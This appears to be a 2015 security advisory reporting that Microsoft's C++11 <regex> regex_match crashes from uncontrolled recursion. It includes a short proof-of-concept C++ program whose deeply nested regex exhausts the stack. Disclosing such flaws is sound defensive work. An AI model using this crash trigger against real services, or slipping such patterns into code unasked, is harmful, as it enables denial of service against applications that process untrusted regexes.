Microsoft C++11 <regex> 'regex_match' function stack exhaustion

2015.11.14

Credit: Maksymilian Arciemowicz

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

Microsoft C++11 <regex> 'regex_match' function Stack Overflow
Auhor: Maksymilian Arciemowicz
Tested on: Windows 10 and Visual Studio 2013
CWE: https://cwe.mitre.org/data/definitions/674.html
The Microsoft C++11 <regex> does not properly control the amount of recursion that takes place, which consumes excessive resources of stack.
Expected 'error_type':
error_stack there was not enough memory to perform a match
Retured:
Crash due stack exhaustion
PoC:
-------------------
#include "stdafx.h"
#include <regex>
#include <iostream>
using namespace std;
int _tmain(int argc, _TCHAR* argv[])
{
const char *first = "abc abc abc abc abc abc abc abc abc";
const char *last = first + strlen(first);
cmatch narrowMatch;
regex rx("((((((((.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*)");
bool found = regex_match(first, last, narrowMatch, rx);
return 0;
}
-------------------

References:

https://cwe.mitre.org/data/definitions/674.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Microsoft C++11 <regex> 'regex_match' function stack exhaustion

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.